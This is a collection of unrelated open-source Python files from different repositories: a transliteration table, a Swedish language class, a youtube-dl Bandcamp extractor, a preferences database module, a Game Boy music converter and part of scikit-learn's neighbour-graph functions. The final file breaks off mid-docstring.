'Zhui ', # 0x0d
'Yuan ', # 0x0e
'Hu ', # 0x0f
'Gang ', # 0x10
'Xiao ', # 0x11
'Cen ', # 0x12
'Pi ', # 0x13
'Bi ', # 0x14
'Jian ', # 0x15
'Yi ', # 0x16
'Dong ', # 0x17
'Shan ', # 0x18
'Sheng ', # 0x19
'Xia ', # 0x1a
'Di ', # 0x1b
'Zhu ', # 0x1c
'Na ', # 0x1d
'Chi ', # 0x1e
'Gu ', # 0x1f
'Li ', # 0x20
'Qie ', # 0x21
'Min ', # 0x22
'Bao ', # 0x23
'Tiao ', # 0x24
'Si ', # 0x25
'Fu ', # 0x26
'Ce ', # 0x27
'Ben ', # 0x28
'Pei ', # 0x29
'Da ', # 0x2a
'Zi ', # 0x2b
'Di ', # 0x2c
'Ling ', # 0x2d
'Ze ', # 0x2e
'Nu ', # 0x2f
'Fu ', # 0x30
'Gou ', # 0x31
'Fan ', # 0x32
'Jia ', # 0x33
'Ge ', # 0x34
'Fan ', # 0x35
'Shi ', # 0x36
'Mao ', # 0x37
'Po ', # 0x38
'Sey ', # 0x39
'Jian ', # 0x3a
'Qiong ', # 0x3b
'Long ', # 0x3c
'Souke ', # 0x3d
'Bian ', # 0x3e
'Luo ', # 0x3f
'Gui ', # 0x40
'Qu ', # 0x41
'Chi ', # 0x42
'Yin ', # 0x43
'Yao ', # 0x44
'Xian ', # 0x45
'Bi ', # 0x46
'Qiong ', # 0x47
'Gua ', # 0x48
'Deng ', # 0x49
'Jiao ', # 0x4a
'Jin ', # 0x4b
'Quan ', # 0x4c
'Sun ', # 0x4d
'Ru ', # 0x4e
'Fa ', # 0x4f
'Kuang ', # 0x50
'Zhu ', # 0x51
'Tong ', # 0x52
'Ji ', # 0x53
'Da ', # 0x54
'Xing ', # 0x55
'Ce ', # 0x56
'Zhong ', # 0x57
'Kou ', # 0x58
'Lai ', # 0x59
'Bi ', # 0x5a
'Shai ', # 0x5b
'Dang ', # 0x5c
'Zheng ', # 0x5d
'Ce ', # 0x5e
'Fu ', # 0x5f
'Yun ', # 0x60
'Tu ', # 0x61
'Pa ', # 0x62
'Li ', # 0x63
'Lang ', # 0x64
'Ju ', # 0x65
'Guan ', # 0x66
'Jian ', # 0x67
'Han ', # 0x68
'Tong ', # 0x69
'Xia ', # 0x6a
'Zhi ', # 0x6b
'Cheng ', # 0x6c
'Suan ', # 0x6d
'Shi ', # 0x6e
'Zhu ', # 0x6f
'Zuo ', # 0x70
'Xiao ', # 0x71
'Shao ', # 0x72
'Ting ', # 0x73
'Ce ', # 0x74
'Yan ', # 0x75
'Gao ', # 0x76
'Kuai ', # 0x77
'Gan ', # 0x78
'Chou ', # 0x79
'Kago ', # 0x7a
'Gang ', # 0x7b
'Yun ', # 0x7c
'O ', # 0x7d
'Qian ', # 0x7e
'Xiao ', # 0x7f
'Jian ', # 0x80
'Pu ', # 0x81
'Lai ', # 0x82
'Zou ', # 0x83
'Bi ', # 0x84
'Bi ', # 0x85
'Bi ', # 0x86
'Ge ', # 0x87
'Chi ', # 0x88
'Guai ', # 0x89
'Yu ', # 0x8a
'Jian ', # 0x8b
'Zhao ', # 0x8c
'Gu ', # 0x8d
'Chi ', # 0x8e
'Zheng ', # 0x8f
'Jing ', # 0x90
'Sha ', # 0x91
'Zhou ', # 0x92
'Lu ', # 0x93
'Bo ', # 0x94
'Ji ', # 0x95
'Lin ', # 0x96
'Suan ', # 0x97
'Jun ', # 0x98
'Fu ', # 0x99
'Zha ', # 0x9a
'Gu ', # 0x9b
'Kong ', # 0x9c
'Qian ', # 0x9d
'Quan ', # 0x9e
'Jun ', # 0x9f
'Chui ', # 0xa0
'Guan ', # 0xa1
'Yuan ', # 0xa2
'Ce ', # 0xa3
'Ju ', # 0xa4
'Bo ', # 0xa5
'Ze ', # 0xa6
'Qie ', # 0xa7
'Tuo ', # 0xa8
'Luo ', # 0xa9
'Dan ', # 0xaa
'Xiao ', # 0xab
'Ruo ', # 0xac
'Jian ', # 0xad
'Xuan ', # 0xae
'Bian ', # 0xaf
'Sun ', # 0xb0
'Xiang ', # 0xb1
'Xian ', # 0xb2
'Ping ', # 0xb3
'Zhen ', # 0xb4
'Sheng ', # 0xb5
'Hu ', # 0xb6
'Shi ', # 0xb7
'Zhu ', # 0xb8
'Yue ', # 0xb9
'Chun ', # 0xba
'Lu ', # 0xbb
'Wu ', # 0xbc
'Dong ', # 0xbd
'Xiao ', # 0xbe
'Ji ', # 0xbf
'Jie ', # 0xc0
'Huang ', # 0xc1
'Xing ', # 0xc2
'Mei ', # 0xc3
'Fan ', # 0xc4
'Chui ', # 0xc5
'Zhuan ', # 0xc6
'Pian ', # 0xc7
'Feng ', # 0xc8
'Zhu ', # 0xc9
'Hong ', # 0xca
'Qie ', # 0xcb
'Hou ', # 0xcc
'Qiu ', # 0xcd
'Miao ', # 0xce
'Qian ', # 0xcf
'[?] ', # 0xd0
'Kui ', # 0xd1
'Sik ', # 0xd2
'Lou ', # 0xd3
'Yun ', # 0xd4
'He ', # 0xd5
'Tang ', # 0xd6
'Yue ', # 0xd7
'Chou ', # 0xd8
'Gao ', # 0xd9
'Fei ', # 0xda
'Ruo ', # 0xdb
'Zheng ', # 0xdc
'Gou ', # 0xdd
'Nie ', # 0xde
'Qian ', # 0xdf
'Xiao ', # 0xe0
'Cuan ', # 0xe1
'Gong ', # 0xe2
'Pang ', # 0xe3
'Du ', # 0xe4
'Li ', # 0xe5
'Bi ', # 0xe6
'Zhuo ', # 0xe7
'Chu ', # 0xe8
'Shai ', # 0xe9
'Chi ', # 0xea
'Zhu ', # 0xeb
'Qiang ', # 0xec
'Long ', # 0xed
'Lan ', # 0xee
'Jian ', # 0xef
'Bu ', # 0xf0
'Li ', # 0xf1
'Hui ', # 0xf2
'Bi ', # 0xf3
'Di ', # 0xf4
'Cong ', # 0xf5
'Yan ', # 0xf6
'Peng ', # 0xf7
'Sen ', # 0xf8
'Zhuan ', # 0xf9
'Pai ', # 0xfa
'Piao ', # 0xfb
'Dou ', # 0xfc
'Yu ', # 0xfd
'Mie ', # 0xfe
'Zhuan ', # 0xff
)
|
whip112/Whip112
|
refs/heads/master
|
vendor/packages/translate/lang/sv.py
|
30
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009 Zuza Software Foundation
#
# This file is part of the Translate Toolkit.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""This module represents the the Swedish language.
.. seealso:: http://en.wikipedia.org/wiki/Swedish_language
"""
from translate.lang import common
class sv(common.Common):
"""This class represents Swedish."""
validaccel = u"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" + \
u"1234567890" + \
u"åäöÅÄÖ"
|
Dino0631/RedRain-Bot
|
refs/heads/develop
|
cogs/lib/youtube_dl/extractor/bandcamp.py
|
12
|
from __future__ import unicode_literals
import json
import random
import re
import time
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urlparse,
)
from ..utils import (
ExtractorError,
float_or_none,
int_or_none,
KNOWN_EXTENSIONS,
parse_filesize,
unescapeHTML,
update_url_query,
unified_strdate,
)
class BandcampIE(InfoExtractor):
_VALID_URL = r'https?://.*?\.bandcamp\.com/track/(?P<title>[^/?#&]+)'
_TESTS = [{
'url': 'http://youtube-dl.bandcamp.com/track/youtube-dl-test-song',
'md5': 'c557841d5e50261777a6585648adf439',
'info_dict': {
'id': '1812978515',
'ext': 'mp3',
'title': "youtube-dl \"'/\\\u00e4\u21ad - youtube-dl test song \"'/\\\u00e4\u21ad",
'duration': 9.8485,
},
'_skip': 'There is a limit of 200 free downloads / month for the test song'
}, {
'url': 'http://benprunty.bandcamp.com/track/lanius-battle',
'md5': '0369ace6b939f0927e62c67a1a8d9fa7',
'info_dict': {
'id': '2650410135',
'ext': 'aiff',
'title': 'Ben Prunty - Lanius (Battle)',
'uploader': 'Ben Prunty',
},
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
title = mobj.group('title')
webpage = self._download_webpage(url, title)
thumbnail = self._html_search_meta('og:image', webpage, default=None)
m_download = re.search(r'freeDownloadPage: "(.*?)"', webpage)
if not m_download:
m_trackinfo = re.search(r'trackinfo: (.+),\s*?\n', webpage)
if m_trackinfo:
json_code = m_trackinfo.group(1)
data = json.loads(json_code)[0]
track_id = compat_str(data['id'])
if not data.get('file'):
raise ExtractorError('Not streamable', video_id=track_id, expected=True)
formats = []
for format_id, format_url in data['file'].items():
ext, abr_str = format_id.split('-', 1)
formats.append({
'format_id': format_id,
'url': self._proto_relative_url(format_url, 'http:'),
'ext': ext,
'vcodec': 'none',
'acodec': ext,
'abr': int_or_none(abr_str),
})
self._sort_formats(formats)
return {
'id': track_id,
'title': data['title'],
'thumbnail': thumbnail,
'formats': formats,
'duration': float_or_none(data.get('duration')),
}
else:
raise ExtractorError('No free songs found')
download_link = m_download.group(1)
video_id = self._search_regex(
r'(?ms)var TralbumData = .*?[{,]\s*id: (?P<id>\d+),?$',
webpage, 'video id')
download_webpage = self._download_webpage(
download_link, video_id, 'Downloading free downloads page')
blob = self._parse_json(
self._search_regex(
r'data-blob=(["\'])(?P<blob>{.+?})\1', download_webpage,
'blob', group='blob'),
video_id, transform_source=unescapeHTML)
info = blob['digital_items'][0]
downloads = info['downloads']
track = info['title']
artist = info.get('artist')
title = '%s - %s' % (artist, track) if artist else track
download_formats = {}
for f in blob['download_formats']:
name, ext = f.get('name'), f.get('file_extension')
if all(isinstance(x, compat_str) for x in (name, ext)):
download_formats[name] = ext.strip('.')
formats = []
for format_id, f in downloads.items():
format_url = f.get('url')
if not format_url:
continue
# Stat URL generation algorithm is reverse engineered from
# download_*_bundle_*.js
stat_url = update_url_query(
format_url.replace('/download/', '/statdownload/'), {
'.rand': int(time.time() * 1000 * random.random()),
})
format_id = f.get('encoding_name') or format_id
stat = self._download_json(
stat_url, video_id, 'Downloading %s JSON' % format_id,
transform_source=lambda s: s[s.index('{'):s.rindex('}') + 1],
fatal=False)
if not stat:
continue
retry_url = stat.get('retry_url')
if not isinstance(retry_url, compat_str):
continue
formats.append({
'url': self._proto_relative_url(retry_url, 'http:'),
'ext': download_formats.get(format_id),
'format_id': format_id,
'format_note': f.get('description'),
'filesize': parse_filesize(f.get('size_mb')),
'vcodec': 'none',
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'thumbnail': info.get('thumb_url') or thumbnail,
'uploader': info.get('artist'),
'artist': artist,
'track': track,
'formats': formats,
}
class BandcampAlbumIE(InfoExtractor):
IE_NAME = 'Bandcamp:album'
_VALID_URL = r'https?://(?:(?P<subdomain>[^.]+)\.)?bandcamp\.com(?:/album/(?P<album_id>[^/?#&]+))?'
_TESTS = [{
'url': 'http://blazo.bandcamp.com/album/jazz-format-mixtape-vol-1',
'playlist': [
{
'md5': '39bc1eded3476e927c724321ddf116cf',
'info_dict': {
'id': '1353101989',
'ext': 'mp3',
'title': 'Intro',
}
},
{
'md5': '1a2c32e2691474643e912cc6cd4bffaa',
'info_dict': {
'id': '38097443',
'ext': 'mp3',
'title': 'Kero One - Keep It Alive (Blazo remix)',
}
},
],
'info_dict': {
'title': 'Jazz Format Mixtape vol.1',
'id': 'jazz-format-mixtape-vol-1',
'uploader_id': 'blazo',
},
'params': {
'playlistend': 2
},
'skip': 'Bandcamp imposes download limits.'
}, {
'url': 'http://nightbringer.bandcamp.com/album/hierophany-of-the-open-grave',
'info_dict': {
'title': 'Hierophany of the Open Grave',
'uploader_id': 'nightbringer',
'id': 'hierophany-of-the-open-grave',
},
'playlist_mincount': 9,
}, {
'url': 'http://dotscale.bandcamp.com',
'info_dict': {
'title': 'Loom',
'id': 'dotscale',
'uploader_id': 'dotscale',
},
'playlist_mincount': 7,
}, {
# with escaped quote in title
'url': 'https://jstrecords.bandcamp.com/album/entropy-ep',
'info_dict': {
'title': '"Entropy" EP',
'uploader_id': 'jstrecords',
'id': 'entropy-ep',
},
'playlist_mincount': 3,
}, {
# not all tracks have songs
'url': 'https://insulters.bandcamp.com/album/we-are-the-plague',
'info_dict': {
'id': 'we-are-the-plague',
'title': 'WE ARE THE PLAGUE',
'uploader_id': 'insulters',
},
'playlist_count': 2,
}]
@classmethod
def suitable(cls, url):
return (False
if BandcampWeeklyIE.suitable(url) or BandcampIE.suitable(url)
else super(BandcampAlbumIE, cls).suitable(url))
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
uploader_id = mobj.group('subdomain')
album_id = mobj.group('album_id')
playlist_id = album_id or uploader_id
webpage = self._download_webpage(url, playlist_id)
track_elements = re.findall(
r'(?s)<div[^>]*>(.*?<a[^>]+href="([^"]+?)"[^>]+itemprop="url"[^>]*>.*?)</div>', webpage)
if not track_elements:
raise ExtractorError('The page doesn\'t contain any tracks')
# Only tracks with duration info have songs
entries = [
self.url_result(compat_urlparse.urljoin(url, t_path), ie=BandcampIE.ie_key())
for elem_content, t_path in track_elements
if self._html_search_meta('duration', elem_content, default=None)]
title = self._html_search_regex(
r'album_title\s*:\s*"((?:\\.|[^"\\])+?)"',
webpage, 'title', fatal=False)
if title:
title = title.replace(r'\"', '"')
return {
'_type': 'playlist',
'uploader_id': uploader_id,
'id': playlist_id,
'title': title,
'entries': entries,
}
class BandcampWeeklyIE(InfoExtractor):
IE_NAME = 'Bandcamp:weekly'
_VALID_URL = r'https?://(?:www\.)?bandcamp\.com/?\?(?:.*?&)?show=(?P<id>\d+)'
_TESTS = [{
'url': 'https://bandcamp.com/?show=224',
'md5': 'b00df799c733cf7e0c567ed187dea0fd',
'info_dict': {
'id': '224',
'ext': 'opus',
'title': 'BC Weekly April 4th 2017 - Magic Moments',
'description': 'md5:5d48150916e8e02d030623a48512c874',
'duration': 5829.77,
'release_date': '20170404',
'series': 'Bandcamp Weekly',
'episode': 'Magic Moments',
'episode_number': 208,
'episode_id': '224',
}
}, {
'url': 'https://bandcamp.com/?blah/blah@&show=228',
'only_matching': True
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
blob = self._parse_json(
self._search_regex(
r'data-blob=(["\'])(?P<blob>{.+?})\1', webpage,
'blob', group='blob'),
video_id, transform_source=unescapeHTML)
show = blob['bcw_show']
# This is desired because any invalid show id redirects to `bandcamp.com`
# which happens to expose the latest Bandcamp Weekly episode.
show_id = int_or_none(show.get('show_id')) or int_or_none(video_id)
formats = []
for format_id, format_url in show['audio_stream'].items():
if not isinstance(format_url, compat_str):
continue
for known_ext in KNOWN_EXTENSIONS:
if known_ext in format_id:
ext = known_ext
break
else:
ext = None
formats.append({
'format_id': format_id,
'url': format_url,
'ext': ext,
'vcodec': 'none',
})
self._sort_formats(formats)
title = show.get('audio_title') or 'Bandcamp Weekly'
subtitle = show.get('subtitle')
if subtitle:
title += ' - %s' % subtitle
episode_number = None
seq = blob.get('bcw_seq')
if seq and isinstance(seq, list):
try:
episode_number = next(
int_or_none(e.get('episode_number'))
for e in seq
if isinstance(e, dict) and int_or_none(e.get('id')) == show_id)
except StopIteration:
pass
return {
'id': video_id,
'title': title,
'description': show.get('desc') or show.get('short_desc'),
'duration': float_or_none(show.get('audio_duration')),
'is_live': False,
'release_date': unified_strdate(show.get('published_date')),
'series': 'Bandcamp Weekly',
'episode': show.get('subtitle'),
'episode_number': episode_number,
'episode_id': compat_str(video_id),
'formats': formats
}
|
latusrepo/propmtime
|
refs/heads/master
|
propmtime/gui/preferences.py
|
2
|
import os
import datetime
from distutils.util import strtobool
import sqlalchemy
import sqlalchemy.orm
import sqlalchemy.ext.declarative
import sqlalchemy.exc
from balsa import get_logger
from propmtime import __application_name__, __version__, DB_EXTENSION, convert_to_bool
log = get_logger(__application_name__)
"""
Reads/writes to the preferences DB. All accesses to the DB are via this module.
"""
Base = sqlalchemy.ext.declarative.declarative_base()
PREFERENCES_FILE = 'preferences' + DB_EXTENSION
class KeyValueTable(Base):
__tablename__ = 'keyvalue'
key = sqlalchemy.Column(sqlalchemy.String(), primary_key=True)
value = sqlalchemy.Column(sqlalchemy.String())
datetime = sqlalchemy.Column(sqlalchemy.DateTime())
class PathsTable(Base):
__tablename__ = 'paths'
path = sqlalchemy.Column(sqlalchemy.String(), primary_key=True)
watched = sqlalchemy.Column(sqlalchemy.Boolean())
datetime = sqlalchemy.Column(sqlalchemy.DateTime())
class PropMTimePreferences:
def __init__(self, app_data_folder, init=False):
log.debug('Preferences __init__')
self._do_hidden_string = 'hidden'
self._do_system_string = 'system'
self._verbose_string = 'verbose'
self._background_monitor_string = 'monitor'
self._version_string = 'version' # this DB (not the overall app)
self.version = '0.0.2' # current version of the DB
created_db = False
if not app_data_folder:
log.error(app_data_folder)
raise RuntimeError
self.app_data_folder = app_data_folder
os.makedirs(self.app_data_folder, exist_ok=True)
self._db_path = os.path.abspath(os.path.join(self.app_data_folder, PREFERENCES_FILE))
self._sqlite_path = 'sqlite:///' + self._db_path
log.debug('preferences DB path : %s' % self._sqlite_path)
self._db_engine = sqlalchemy.create_engine(self._sqlite_path) # , echo=True)
if init and Base.metadata.tables is None:
# new DB
log.info('creating DB')
Base.metadata.create_all(self._db_engine)
created_db = True
# got an old version of the DB - initialize
if init and not created_db and self.get_version() != self.version:
log.warn('preferences DB - current version %s is incompatible with existing version %s - re-initializing' %
(self.version, self.get_version()))
Base.metadata.drop_all(self._db_engine)
Base.metadata.create_all(self._db_engine)
created_db = True
if created_db:
self.set_version(self.version)
log.debug('exiting Preferences __init__')
def get_db_path(self):
return self._sqlite_path
def _get_session(self):
return sqlalchemy.orm.sessionmaker(bind=self._db_engine)()
def _kv_set(self, key, value):
log.debug('pref_set : %s to %s' % (str(key), str(value)))
session = self._get_session()
kv_table = KeyValueTable(key=key, value=value, datetime=datetime.datetime.utcnow())
q = session.query(KeyValueTable).filter_by(key=key).first()
if q:
session.delete(q)
session.add(kv_table)
session.commit()
session.close()
log.debug('exiting pref_set')
def _kv_get(self, key):
value = None
session = self._get_session()
try:
row = session.query(KeyValueTable).filter_by(key=key).first()
except sqlalchemy.exc.OperationalError as e:
row = None
if row:
value = row.value
session.close()
log.debug('pref_get : %s = %s' % (str(key), str(value)))
return value
def set_version(self, value):
self._kv_set(self._version_string, value)
def get_version(self):
return self._kv_get(self._version_string)
def set_do_hidden(self, value):
assert(type(value) is bool)
self._kv_set(self._do_hidden_string, value)
def get_do_hidden(self):
return convert_to_bool(self._kv_get(self._do_hidden_string))
def set_do_system(self, value):
assert(type(value) is bool)
self._kv_set(self._do_system_string, convert_to_bool(value))
def get_do_system(self):
return convert_to_bool(self._kv_get(self._do_system_string))
def set_verbose(self, value):
assert(type(value) is bool)
self._kv_set(self._verbose_string, value)
def get_verbose(self):
return convert_to_bool(self._kv_get(self._verbose_string))
def add_path(self, path):
session = self._get_session()
session.add(PathsTable(path=path, watched=False, datetime=datetime.datetime.utcnow()))
session.commit()
session.close()
def remove_path(self, path):
session = self._get_session()
session.query(PathsTable).filter_by(path=path).delete()
session.commit()
session.close()
def get_all_paths(self):
session = self._get_session()
paths = {row.path: row.watched for row in session.query(PathsTable)}
watches = [row.watched for row in session.query(PathsTable)]
session.close()
for path in paths:
log.debug('get_all_paths : %s' % path)
return paths
def set_path_watched(self, path, watched_value):
session = self._get_session()
session.query(PathsTable).filter_by(path=path).update({"watched": watched_value})
session.commit()
session.close()
def is_path_watched(self, path):
session = self._get_session()
watched = [row.watched for row in session.query(PathsTable).filter_by(path=path)]
if watched and len(watched) > 0:
# should only be one since only one row per path
return convert_to_bool(watched[0])
return False
def get_app_data_folder(self):
return self.app_data_folder
def init_preferences_db(app_data_folder):
# call this at the beginning of every program that uses this module
pref = PropMTimePreferences(app_data_folder, init=True)
log.info('%s version %s' % (__application_name__, __version__))
log.info('preferences DB version %s' % pref.get_version())
|
Ifiht/GBVideoPlayer
|
refs/heads/master
|
itt.py
|
3
|
import sys
music = open(sys.argv[1]).read().splitlines()
ticks = int(sys.argv[2])
ticks_per_line = float(ticks) / len(music)
MIDDLE_A = 440.0
SEMITONE = 2.0 ** (1/12.0)
MIDDLE_C = MIDDLE_A * SEMITONE ** 3
SLIDE_MAGIC = SEMITONE ** (1/8.0)
DRUMS = {
"C-503": "201F2177228B2380".decode("hex"),
"C-504": "203F218122312380".decode("hex"),
"C-505": "203F219222102380".decode("hex"),
"C-506": "203F217122002380".decode("hex"),
"C-507": "203F217122512380".decode("hex"),
"A-407": "203F217122412380".decode("hex"),
"C-508": "203F21F1226B2380".decode("hex"),
}
#203F2188226B2380 # Bass
#203F217122002380 # Close hat
#203F218122312380 # Snare
#203F219222102380 # Open hat
def note_to_frequency(note):
index = ["C-", "C#", "D-", "D#", "E-", "F-", "F#", "G-", "G#", "A-", "A#", "B-"].index(note[:2])
octave = int(note[2]) - 5
return MIDDLE_C * (SEMITONE ** index) * (2.0 ** octave)
pending_delay = 0
previous_frequencies = [None] * 3
for line in music:
instruments = line[1:].split("|")
# Instruments 1 & 2
for index, instrument in enumerate(instruments[0:2]):
note = instrument[0:3]
volume = instrument[6:8]
command = instrument[8]
command_value = instrument[9:11]
if note == "===":
volume = "00"
command = "."
note = "..."
elif note != "...":
if volume == "..":
volume = "64"
if volume != "..":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
volume = int(volume)
volume = int(round(volume / 64.0 * 0xF))
sys.stdout.write("\x12" if index == 0 else "\x17")
sys.stdout.write(chr(volume * 0x10))
if note != "...":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
frequency = note_to_frequency(note)
previous_frequencies[index] = frequency
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x13" if index == 0 else "\x18")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x14" if index == 0 else "\x19")
sys.stdout.write(chr((gb_frequency / 0x100) | 0x80)) # 80 = Init sound
if command == "F":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[index] *= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[index]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x13" if index == 0 else "\x18")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x14" if index == 0 else "\x19")
sys.stdout.write(chr((gb_frequency / 0x100)))
if command == "E":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[index] /= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[index]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x13" if index == 0 else "\x18")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x14" if index == 0 else "\x19")
sys.stdout.write(chr((gb_frequency / 0x100)))
# Instrument 3
note = instruments[2][0:3]
command = instruments[2][8]
command_value = instruments[2][9:11]
if note != "...":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
if note == "===":
sys.stdout.write("\x1A\x00") # Channel Off
else:
frequency = note_to_frequency(note)
previous_frequencies[2] = frequency
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
try:
sys.stdout.write("\x1A\x80") # Channel On
sys.stdout.write("\x1D")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x1E")
sys.stdout.write(chr((gb_frequency / 0x100) | 0x80)) # 80 = Init sound
except:
sys.stderr.write(line+"\n")
if command == "F":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[2] *= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[2]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x1D")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x1E")
sys.stdout.write(chr((gb_frequency / 0x100)))
if command == "E":
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
previous_frequencies[2] /= SLIDE_MAGIC ** int(command_value)
frequency = previous_frequencies[2]
gb_frequency = int(round(2048 - 131072/frequency))
assert gb_frequency < 2048
sys.stdout.write("\x1D")
sys.stdout.write(chr(gb_frequency & 0xFF))
sys.stdout.write("\x1E")
sys.stdout.write(chr((gb_frequency / 0x100)))
pending_delay += ticks_per_line
# Instrument 4
sample = instruments[3][:5]
if sample in DRUMS:
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
sys.stdout.write(DRUMS[sample])
elif sample != ".....":
sys.stderr.write("Missing drum definition for %s. \n" % (sample,))
if pending_delay >= 1:
sys.stdout.write("\x90")
sys.stdout.write(chr(int(pending_delay)))
pending_delay %= 1
|
valexandersaulys/prudential_insurance_kaggle
|
refs/heads/master
|
venv/lib/python2.7/site-packages/sklearn/neighbors/graph.py
|
208
|
"""Nearest Neighbors graph functions"""
# Author: Jake Vanderplas <vanderplas@astro.washington.edu>
#
# License: BSD 3 clause (C) INRIA, University of Amsterdam
import warnings
from .base import KNeighborsMixin, RadiusNeighborsMixin
from .unsupervised import NearestNeighbors
def _check_params(X, metric, p, metric_params):
"""Check the validity of the input parameters"""
params = zip(['metric', 'p', 'metric_params'],
[metric, p, metric_params])
est_params = X.get_params()
for param_name, func_param in params:
if func_param != est_params[param_name]:
raise ValueError(
"Got %s for %s, while the estimator has %s for "
"the same parameter." % (
func_param, param_name, est_params[param_name]))
def _query_include_self(X, include_self, mode):
"""Return the query based on include_self param"""
# Done to preserve backward compatibility.
if include_self is None:
if mode == "connectivity":
warnings.warn(
"The behavior of 'kneighbors_graph' when mode='connectivity' "
"will change in version 0.18. Presently, the nearest neighbor "
"of each sample is the sample itself. Beginning in version "
"0.18, the default behavior will be to exclude each sample "
"from being its own nearest neighbor. To maintain the current "
"behavior, set include_self=True.", DeprecationWarning)
include_self = True
else:
include_self = False
if include_self:
query = X._fit_X
else:
query = None
return query
def kneighbors_graph(X, n_neighbors, mode='connectivity', metric='minkowski',
p=2, metric_params=None, include_self=None):
"""Computes the (weighted) graph of k-Neighbors for points in X
Read more in the :ref:`User Guide <unsupervised_neighbors>`.
Parameters
----------
X : array-like or BallTree, shape = [n_samples, n_features]
Sample data, in the form of a numpy array or a precomputed
:class:`BallTree`.
n_neighbors : int
Number of neighbors for each sample.
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
metric : string, default 'minkowski'
The distance metric used to calculate the k-Neighbors for each sample
point. The DistanceMetric class gives a list of available metrics.
The default distance is 'euclidean' ('minkowski' metric with the p
param equal to 2.)
include_self: bool, default backward-compatible.
Whether or not to mark each sample as the first nearest neighbor to
itself. If `None`, then True is used for mode='connectivity' and False
for mode='distance' as this will preserve backwards compatibilty. From
version 0.18, the default value will be False, irrespective of the
value of `mode`.
p : int, default 2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric_params: dict, optional
additional keyword arguments for the metric function.
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples]
A[i, j] is assigned the weight of edge that connects i to j.
Examples
--------
>>> X = [[0], [3], [1]]
>>> from sklearn.neighbors import kneighbors_graph
>>> A = kneighbors_graph(X, 2)
>>> A.toarray()
array([[ 1., 0., 1.],
[ 0., 1., 1.],
[ 1., 0., 1.]])
See also
--------
radius_neighbors_graph
"""
if not isinstance(X, KNeighborsMixin):
X = NearestNeighbors(n_neighbors, metric=metric, p=p,
metric_params=metric_params).fit(X)
else:
_check_params(X, metric, p, metric_params)
query = _query_include_self(X, include_self, mode)
return X.kneighbors_graph(X=query, n_neighbors=n_neighbors, mode=mode)
def radius_neighbors_graph(X, radius, mode='connectivity', metric='minkowski',
p=2, metric_params=None, include_self=None):
"""Computes the (weighted) graph of Neighbors for points in X
Neighborhoods are restricted the points at a distance lower than
radius.
Read more in the :ref:`User Guide <unsupervised_neighbors>`.
Parameters
----------
X : array-like or BallTree, shape = [n_samples, n_features]
Sample data, in the form of a numpy array or a precomputed
:class:`BallTree`.
radius : float
Radius of neighborhoods.
mode : {'connectivity', 'distance'}, optional
Type of returned matrix: 'connectivity' will return the
connectivity matrix with ones and zeros, in 'distance' the
edges are Euclidean distance between points.
metric : string, default 'minkowski'
The distance metric used to calculate the neighbors within a
given radius for each sample point. The DistanceMetric class
gives a list of available metrics. The default distance is
'euclidean' ('minkowski' metric with the param equal to 2.)
include_self: bool, default None
Whether or not to mark each sample as the first nearest neighbor to
itself. If `None`, then True is used for mode='connectivity' and False
for mode='distance' as this will preserve backwards compatibilty. From
version 0.18, the default value will be False, irrespective of the
value of `mode`.
p : int, default 2
Power parameter for the Minkowski metric. When p = 1, this is
equivalent to using manhattan_distance (l1), and euclidean_distance
(l2) for p = 2. For arbitrary p, minkowski_distance (l_p) is used.
metric_params: dict, optional
additional keyword arguments for the metric function.
Returns
-------
A : sparse matrix in CSR format, shape = [n_samples, n_samples]
